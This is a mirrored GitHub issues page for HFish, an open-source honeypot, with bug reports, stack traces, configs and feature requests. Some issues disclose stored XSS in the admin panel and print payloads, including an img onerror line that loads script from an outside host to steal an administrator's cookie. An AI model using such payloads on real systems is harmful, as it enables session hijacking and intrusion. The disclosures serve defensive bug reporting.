hacklcx / hfish Goto Github PK
View Code? Open in Web Editor NEW安全、可靠、简单、免费的企业级蜜罐
Home Page: https://hfish.io
hfish's People
Contributors
Stargazers
Watchers
Forkers
secoba sry309 secretwiki abxuvw deutsch4534 youmuyou fank-cd mchange 276585877 illidanzzzx freemanzyq pandatiramisu tshwangq livein renjunfeng 2qvvpavm davidmr001 m00zh33 thinkergod lubyruffy fangchenhui3 blockchainguard grey-li haoirui raystyle cloudwafs liwuqi gowabby harry1080 imbici secsystem t3st0r-git 3zh superdong0 shimxx ttlbb icysun madaolw nazicc m4d3bug benhe119 shuyabin bollwarm ai-iot ss7247 ppker hogwartsrico hhy5277 02bx tchigher forging2012 stgeo88 shaunstanislauslau huangyuan666 kwff sadnessofatlantis crackercat kuustudio naiteluode attackgithub topkiller gengjf georgewang1994 cathing mvpvg kiariaqaq w7yuu wangdongya geekhuyang changshoumeng wanglisa15 bwangelme xulibo penrightpen dewey363 isgasho mbyase alinew shellsec qsdj ergoapi fansonfan sasqwatch kenny-liu gordoor 1m15m3 zxcdsaz tonghuaroot triplekill xmrio ylx2016 r00to1 yangdi225 mistygg atlas-2020 killvxk ttcluo udeth wjybluse imaiopshfish's Issues
麻烦更新一下DOCKER的0.51吧
docker包还是0.5的,能帮忙更新一下吧
蜜罐系统很直观简洁,提0.5.1版本的两个问题
1.邮件发送不可用
提示:[GIN] 2020/03/10 - 16:18:30 | 200 | 425.828µs | 10.32.166.24 | GET /get/setting/info?id=1
[HFish] 127.0.0.1 - [2020-03-10 16:18:42] 发送邮件通知失败 [EOF]
2.客户端连接正常,功能也正常,上钩列表有内容,但是分布式列表中不显示任何信息。
worker exits from a panic: runtime error: invalid memory address or nil pointer dereference
centos6 部署,运行报错
worker exits from a panic: runtime error: invalid memory address or nil pointer dereference
从HFish 0.5升级上来之后启动失败,缺少配置密码脱敏符号设置
HFish 0.6 版本新增配置“密码脱敏符号设置”
此项为空时造成启动失败,请进行修复。
INSERT INTO hfish_setting VALUES ('1', 'passwdTM', '', '2019-09-02 20:15:00', '0', '密码脱敏符号设置', '密码脱敏符号设置')
希望增加非安全连接的邮件发送
公司邮件系统不支持安全连接方式发送邮件,希望能增加普通邮件的发送配置
后台输出未过滤,xss漏洞,容易被反搞
默认web蜜罐,输入xss payload,蜜罐后台查看触发payload
建议添加报表功能
建议添加报表功能,比如导入ip地址和对应地区的,口令复杂一点爆破的话可以导出密码字典。
[建议]希望添加自动拉黑ip功能或网页端手动拉黑+永恒之蓝蜜罐
请问怎么更新?
the client name can XSS
Modify the client config.ini file in a distributed cluster where the client name constructs an XSS statement to attack the server
[rpc]
status = 2 # 模式 0关闭 1服务端 2客户端
addr = x.x.x.x:7879 # RPC 服务端地址 or 客户端地址
name = < img src=x onerror=alert(1)> # 状态1 服务端 名称 状态2 客户端 名称
web蜜罐能自定义钓鱼页面吗
web蜜罐可以自定义页面吗?伪装成其他登陆页面
支持登录的蜜罐(像SSH这种),可以设置多个密码不?提高登录概率,获取更丰富的数据。
后台管理页面的一些显示 bug
我设置了 SSH 蜜罐为高交互模式(配置文件中 status 设为 2)
然后发现后台的服务状态处显示 SSH 是关闭的,如下图:
经测试,发现只有 status 设为 1 的时候后台服务状态处才不会显示关闭(有小红点)
虽然不是啥功能 bug ,但还是提一下吧,望尽快修复。
另外,后台显示攻击 ip 的扇形图在 ip 多了之后会越界导致显示不全,希望能够有一些优化(例如只将攻击次数多的 ip 地址列出之类的。
启动后异常退出了
报错信息如下
redis 231
更新数据失败
panic: database is locked
goroutine 296 [running]:
HFish/error.Check(...)
/root/go/HFish/error/error.go:11
HFish/core/dbUtil.Update(0xccbb17, 0x32, 0xc0000a1f90, 0x2, 0x2, 0x0)
/root/go/HFish/core/dbUtil/dbUtil.go:89 +0x338
HFish/core/report.ReportUpdateRedis(0xc0001a91eb, 0x3, 0xc00024a980, 0xb)
/root/go/HFish/core/report/report.go:249 +0x109
created by HFish/core/protocol/redis.handleConnection.func5
/root/go/HFish/core/protocol/redis/redis.go:112 +0x23e
希望可以增加smb的蜜罐
RT,可以溯源永恒之蓝病毒的感染机器
web蜜罐逻辑小bug
蜜罐通过调用js记录数据,当我们修改了api地址和key值,只需要在html页面中找到调用的js就可以找到这个两个数据值
不能监控redis
redis 监控后台没有打印任何东西
一些建议
环境:releases0.5.1 + mysql模式
建议:
1.地理位置信息可以开关设置启用禁用;
2.同IP地理位置信息不重复记录,缩小数据库大小,最好可以直接单独开表记录位置,靠ID定义;
3.SSH高交互模式参数配置可以使用变量;
4.hfish_passwd中重复的账号密码只记录一次,缩小数据库大小;
5.hfish_info中project_name最好单独开表定义名字,靠ID定义,缩小数据库大小;
6.api可以增加些查询参数,如黑名单api增加获取的时间范围,密码api增加topN查询
本人小白,目前使用起来挺舒服,已Star,希望大佬可以一直维护下去。
系统admin用户密码怎么更改
SSH包含密码信息报错
更新上钩信息失败 [Error 1267: Illegal mix of collations (utf8mb4_general_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'concat']
windows上启动报错
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in produ
ction.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
[GIN-debug] Loaded HTML Templates (2):
-
- index.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gon
ic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gon
ic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] GET / --> HFish/utils/setting.RunDeep.fun
c1 (2 handlers)
[GIN-debug] POST /api/v1/post/deep_report --> HFish/view/api.ReportDeepWeb (3
handlers)
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in produ
ction.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
[GIN-debug] POST /api/v1/post/plug_report --> HFish/view/api.ReportPlugWeb (3
handlers)
panic: interface conversion: interface {} is nil, not int64
goroutine 1 [running]:
HFish/utils/setting.initCahe()
/ext-go/1/src/HFish/utils/setting/setting.go:159 +0xcec
HFish/utils/setting.Run()
/ext-go/1/src/HFish/utils/setting/setting.go:392 +0xf00
main.main()
/ext-go/1/src/HFish/main.go:22 +0x1c3
关于后台运行
该蜜罐我使用ssh启动,如何后台一直运行,退出ssh后还在线?
管理页面显示不正常
上钩列表没有记录来源ip
telnet,memcache,redis蜜罐存在有上钩记录但来源ip为空的情况:
查看记录信息,发现有一些是http头的部分信息:
还有记录信息为空或其他杂乱信息的情况。
不知道这是什么情况,如果需要其他信息请回复。
建议将管理页面所有绝对路径修改为相对路径
在反向代理使用二级目录时,绝对路径会导致一些问题,建议修改成相对路径。
如未登录情况下访问http://example.com/hfish/ 会跳转http://example.com/login 而不是http://example.com/hfish/login
页面资源也是一样的。
谢谢。
运行一段时间后,panic 异常退出
版本:v0.3
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x9bc1d0]
goroutine 11364 [running]:
sync.(*RWMutex).RLock(...)
/usr/local/go/src/sync/rwmutex.go:48
database/sql.(*Stmt).ExecContext(0x0, 0xddfbe0, 0xc000094020, 0xc00379bf90, 0x2, 0x2, 0x0, 0x0, 0x0, 0x0)
/usr/local/go/src/database/sql/sql.go:2307 +0x50
database/sql.(*Stmt).Exec(...)
/usr/local/go/src/database/sql/sql.go:2336
HFish/core/dbUtil.Update(0xcca995, 0x32, 0xc00379bf90, 0x2, 0x2, 0x0)
/ext-go/1/src/HFish/core/dbUtil/dbUtil.go:87 +0xd9
HFish/core/report.ReportUpdateSSH(0xc0002da0d4, 0x4, 0xcaa51c, 0x2)
/ext-go/1/src/HFish/core/report/report.go:227 +0x109
created by HFish/core/protocol/ssh.Start.func1
/ext-go/1/src/HFish/core/protocol/ssh/ssh.go:59 +0x5b4
小建议
在后台开个原始日志导出的功能怎么样,便于用于其他分析。
像SSH,FTP这种可以加个密码收集功能,收一波字典。
关于cahe写入报错问题
github.com/panjf2000/ants v1.2.0 使用 go mod download 下载报错,升级1.3.0后成功;但是运行代码报错,详情如下
[GIN-debug] POST /api/v1/post/plug_report --> HFish/view/api.ReportPlugWeb (3 handlers)
panic: interface conversion: interface {} is nil, not int64
goroutine 1 [running]:
HFish/utils/setting.initCahe()
E:/GoProject/src/HFish-0.5/utils/setting/setting.go:155 +0x846
HFish/utils/setting.Run()
E:/GoProject/src/HFish-0.5/utils/setting/setting.go:369 +0xec0
main.main()
E:/GoProject/src/HFish-0.5/main.go:10 +0x2d
exit status 2
SSH高交互断开后导致docker爆内存
强制断开后导致服务器宕机。
SSH服务获取命令行输入时键入EOF造成死循环
问题简述
蜜罐的ssh服务在接受用户终端输入时未进行错误处理,导致当攻击者键入Ctrl+D (EOF)时
line, _ = term.ReadLine()抛出错误,但循环并未结束,因此造成死循环,无限执行
if is.Rpc() {
id = client.ReportResult("SSH", "", arr[0], info, "0")
} else {
id = strconv.FormatInt(report.ReportSSH(arr[0], "本机", info), 10)
}造成DDOS,使蜜罐服务器拒绝服务,并在数据库中产生大量垃圾数据。
测试环境
macOS Catalina 10.15.3
go1.13.4 darwin/amd64
修复建议
对term.ReadLine()做错误处理,如下:
if err != nil {
break
}windows 做服务端 报错
尝试 ftp 链接 出错
panic: runtime error: invalid memory address or nil pointer dereference
[signal 0xc0000005 code=0x0 addr=0x0 pc=0xa52d9e]
请问按照集群部署步骤,客户端无法启动的原因是什么?
两台VPS,服务端按步骤配置完毕,也启动成功了。
但客户端vps,按官方文档配置后,一直启动不成功,报错信息如下,请问是什么原因?
建议 上钩列表这里能不能增加个全选的功能?
日志量比较大,建议上钩列表这里能不能增加个全部删除的功能?另外下面这个报错是什么意思数据库文件没权限?还是文件过大写不进去了?
关于ipv6
环境:releases 0.6 + mysql模式
当集群使用ipv6连接时,集群列表无法正确显示IP,上钩列表应该也不能正常显示IP。
建议添加修改支持,谢谢。
建议在上钩列表中提供更多过滤选项
如按长度过滤,按是否登录成功过滤(这个比较有用,可以筛选出来成功登陆的,分析其进一步行为)
蜜罐ssh功能启动不起来
您好,我最新版本得蜜罐ssh怎么都启动不起来,docker容器和二进制得方式都试了,都是ssh不行,其它得ok,我宿主机sshd改了端口和停掉sshd服务都试了,能看看啥情况吗?
环境:
系统是纯净版最小化安装centos7,禁掉了selinux,关掉了firewalld
配置文件:
[root@hello HFish-0.3-linux-amd64]# cat config.ini
[rpc]
status = 0 # 模式 0关闭 1服务端 2客户端
addr = 127.0.0.1:7879 # RPC 服务端地址 or 客户端地址
name = Server # 状态1 服务端 名称 状态2 客户端 名称
[admin] # RPC 状态为2 集群客户端的时候 admin 可以删掉
addr = 0.0.0.0:9001 # 管理后台启动地址
account = admin # 登录账号
password = admin # 登录密码
[api]
status = 0 # 是否启动 API 0 关闭 1 启动
web_url = /api/v1/post/report # WEB蜜罐上报 API
deep_url = /api/v1/post/deep_report # 暗网蜜罐上报 API
plug_url = /api/v1/post/plug_report # 插件蜜罐上报 API
sec_key = 9cbf8a4dcb8e30682b927f352d6559a0 # API 认证秘钥
[plug]
status = 0 # 是否启动 蜜罐插件 0 关闭 1 启动, 需要先启动 API
addr = 0.0.0.0:8989 # 蜜罐插件 启动地址
[web]
status = 1 # 是否启动 WEB 1 启动 0 关闭, 启动 API 后 WEB 方可上报结果
addr = 0.0.0.0:80 # WEB 启动地址,0.0.0.0 对外开放,127.0.0.1 对内开放 可走 Nginx 反向代理
template = wordPress/html # WEB 模板路径
index = index.html # WEB 首页文件
static = wordPress/static # WEB 静态文件路径 注意:必须存在两个目录,html 文件 和静态文件 不能平级
url = / # WEB 访问目录,默认 / 可更改成 index.html index.asp index.php
[deep]
status = 1 # 是否启动 暗网 1 启动 0 关闭, 启动 API 后 方可上报结果
addr = 0.0.0.0:8080 # 暗网 WEB 启动地址
template = deep/html # 暗网 WEB 模板路径
index = index.html # 暗网 WEB 首页文件
static = deep/static # 暗网 WEB 静态文件路径 注意:必须存在两个目录,html 文件 和静态文件 不能平级
url = / # 暗网 WEB 访问目录,默认 / 可更改成 index.html index.asp index.php
[ssh]
status = 2 # 是否启动 SSH 0 关闭 1 低交互 2 高交互
addr = 0.0.0.0:22 # SSH 服务端地址 注意端口冲突,请先关闭服务器 openssh 服务 或 修改端口
[redis]
status = 1 # 是否启动 Redis 0 关闭 1 启动
addr = 0.0.0.0:6379 # Redis 服务端地址 注意端口冲突
[mysql]
status = 1 # 是否启动 Mysql 0 关闭 1 启动
addr = 0.0.0.0:3306 # Mysql 服务端地址 注意端口冲突
files = /etc/passwd,/etc/group # Mysql 服务端读取客户端任意文件; 多写逗号分隔,会随机取
[telnet]
status = 1 # 是否启动 Telnet 0 关闭 1 启动
addr = 0.0.0.0:23 # Telnet 服务端地址 注意端口冲突
[ftp]
status = 1 # 是否启动 Ftp 0 关闭 1 启动
addr = 0.0.0.0:21 # Ftp 服务端地址 注意端口冲突
[mem_cache]
status = 1 # 是否启动 MemCache 0 关闭 1 启动
addr = 0.0.0.0:11211 # Memcache 服务端地址 注意端口冲突
rate_limit = 4 # 每秒响应次数
[root@hello HFish-0.3-linux-amd64]#
启动日志:
[root@hello HFish-0.3-linux-amd64]# ./HFish run
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
2019/09/05 15:38:03 [Memcache TCP] Listning on 0.0.0.0:11211
[GIN-debug] Loaded HTML Templates (2):
-
- index.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] GET / --> HFish/utils/setting.RunWeb.func1 (2 handlers)
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
[GIN-debug] Loaded HTML Templates (2):
-
- index.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] GET / --> HFish/utils/setting.RunDeep.func1 (2 handlers)
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
[GIN-debug] Loaded HTML Templates (11):
- colony.html
- footer.html
- footer
- header
- login.html
- mail.html
-
- dashboard.html
- fish.html
- header.html
- setting.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (5 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (5 handlers)
[GIN-debug] GET /login --> HFish/view/login.Html (5 handlers)
[GIN-debug] POST /login --> HFish/view/login.Login (5 handlers)
[GIN-debug] GET /logout --> HFish/view/login.Logout (5 handlers)
[GIN-debug] GET / --> HFish/view/dashboard.Html (6 handlers)
[GIN-debug] GET /dashboard --> HFish/view/dashboard.Html (6 handlers)
[GIN-debug] GET /get/dashboard/data --> HFish/view/dashboard.GetFishData (6 handlers)
[GIN-debug] GET /get/dashboard/pie_data --> HFish/view/dashboard.GetFishPieData (6 handlers)
[GIN-debug] GET /fish --> HFish/view/fish.Html (6 handlers)
[GIN-debug] GET /get/fish/list --> HFish/view/fish.GetFishList (6 handlers)
[GIN-debug] GET /get/fish/info --> HFish/view/fish.GetFishInfo (6 handlers)
[GIN-debug] GET /get/fish/typeList --> HFish/view/fish.GetFishTypeInfo (6 handlers)
[GIN-debug] POST /post/fish/del --> HFish/view/fish.PostFishDel (6 handlers)
[GIN-debug] GET /colony --> HFish/view/colony.Html (6 handlers)
[GIN-debug] GET /get/colony/list --> HFish/view/colony.GetColony (6 handlers)
[GIN-debug] POST /post/colony/del --> HFish/view/colony.PostColonyDel (6 handlers)
[GIN-debug] GET /mail --> HFish/view/mail.Html (6 handlers)
[GIN-debug] POST /post/mail/sendEmail --> HFish/view/mail.SendEmailToUsers (6 handlers)
[GIN-debug] GET /setting --> HFish/view/setting.Html (6 handlers)
[GIN-debug] GET /get/setting/info --> HFish/view/setting.GetSettingInfo (6 handlers)
[GIN-debug] POST /post/setting/update --> HFish/view/setting.UpdateEmailInfo (6 handlers)
[GIN-debug] POST /post/setting/updateAlertMail --> HFish/view/setting.UpdateAlertMail (6 handlers)
[GIN-debug] POST /post/setting/checkSetting --> HFish/view/setting.UpdateStatusSetting (6 handlers)
[GIN-debug] POST /post/setting/updateWebHook --> HFish/view/setting.UpdateWebHook (6 handlers)
[GIN-debug] POST /post/setting/updateWhiteIp --> HFish/view/setting.UpdateWhiteIp (6 handlers)
[GIN-debug] GET /api/v1/get/ip --> HFish/view/api.GetIpList (6 handlers)
[GIN-debug] GET /api/v1/get/fish_info --> HFish/view/api.GetFishInfo (6 handlers)
运行如图:
我好像是上个月前在我另一台vps上测试得是好用得那时候不知道是哪个版本了,这次用的最新版本,没测试老版本。
webhook调用成功 并没有信息通知到微信
tail: hfish.log: file truncated
[HFish] 127.0.0.1 - [2020-03-11 16:21:28] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:30] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:31] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:32] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:50] WebHook 调用成功 []
后台记录命令错误
记录的命令在后台显示存在xss
发送邮件失败 5.0版本
docker仅映射config.ini后目录为空?
hi 很抱歉打扰你们。我在用docker构建后,并没有像 /hfish/:/opt/HFish/ 整个目录。。而是 仅仅映射 /hfish/config.ini:/opt/HFish/config.ini 但貌似这样,docker启动后则报 ./HFish not found,说明目录被清空了。希望可以得到答复。
假设有个 ip 频繁访问服务器,可以用这个项目做什么吗?
假设有个 ip 频繁访问服务器,可以用这个项目做什么吗?有什么具体的样例呢?
打开配置文件失败
打开配置文件失败 [open ./config.ini: no such file or directory]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x58 pc=0xa2046e]
已下载 HFish-0.6.3-linux-amd64.tar.gz
cd HFish-0.6.3-linux-amd64
./HFish run
webhook字段长度不够
Docker with Web Api ERROR!
hi! hacklcx!!! When I simulated the process of using docker to build HFish quickly in a public network server, I found unexpected problems with JS in the WEB project.
docker exec -it hfish /bin/sh
cat config.ini
[api]
status = 1 # 是否启动 API 1 启动 0 关闭
web_url = /api/v1/post/report # 管理后台启动地址
deep_url = /api/v1/post/deep_report # 管理后台启动地址
Than error show that:
cat x.js
function report() {
var login_field = $("#user_login").val();
var password = $("#user_pass").val();
$.ajax({
type: "POST",
url: "http://localhost:9001/api/v1/post/dart_report",
In branch dev deep_report= dart_report, so an Api about dart_report not found.
But the problem has been fixed in branch master
I recommend using master to build docker image
Is the purpose to be more realistic?
如果要在外部进行连接时觉得更逼真的话,应该在最初进行连接的时候,加入一点点的随机延迟。比如:time.Sleep(time.Millisecond * time.Duration(rand.Intn(300)))
以上来自实际使用的一点体验。
If you want to make the connection more realistic, there should be a little delay, random delay. Now the result's returning too fast.
This is the experience from actual use.
XSS exists in the information,can get cookie
In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks.
Insert XSS payload where the password is entered
XSS code is triggered when the administrator views the information
Use the following code to get a cookie.
<img src=a onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974" height="0" width="0">
3.1不能记录ssh mysql等行为
我升成3.1发现 本地测试记录不了mysql ssh telnet等行为,还没排查问题在哪了,测试环境docker debian
启动直接崩溃
启动直接崩溃,运行环境2核2g centos 7 0.3.2版本二进制运行
2019/10/11 13:22:34 worker exits from a panic: runtime error: invalid memory address or nil pointer dereference
2019/10/11 13:22:34 worker exits from a panic: runtime error: invalid memory address or nil pointer dereference
2019/10/11 13:22:34 worker exits from panic: goroutine 68 [running]:
HFish/vendor/github.com/panjf2000/ants.(*Worker).run.func1.1(0xc0005fd650)
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:59 +0x13e
panic(0xc571c0, 0x15d8330)
/usr/local/go/src/runtime/panic.go:522 +0x1b5
HFish/core/protocol/mysql.Start.func1()
/ext-go/1/src/HFish/core/protocol/mysql/mysql.go:66 +0x12e
HFish/vendor/github.com/panjf2000/ants.(*Worker).run.func1(0xc0005fd650)
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:71 +0x9b
created by HFish/vendor/github.com/panjf2000/ants.(*Worker).run
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:49 +0x4d
用awvs扫描器扫web蜜罐站点发现程序直接报错退出
用awvs扫描器扫web蜜罐发现程序直接报错退出请问这个是什么原因是不是哪里需要配置?
report xss
web蜜罐的static/x.js上报的数据包中name参数存在xss问题。
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.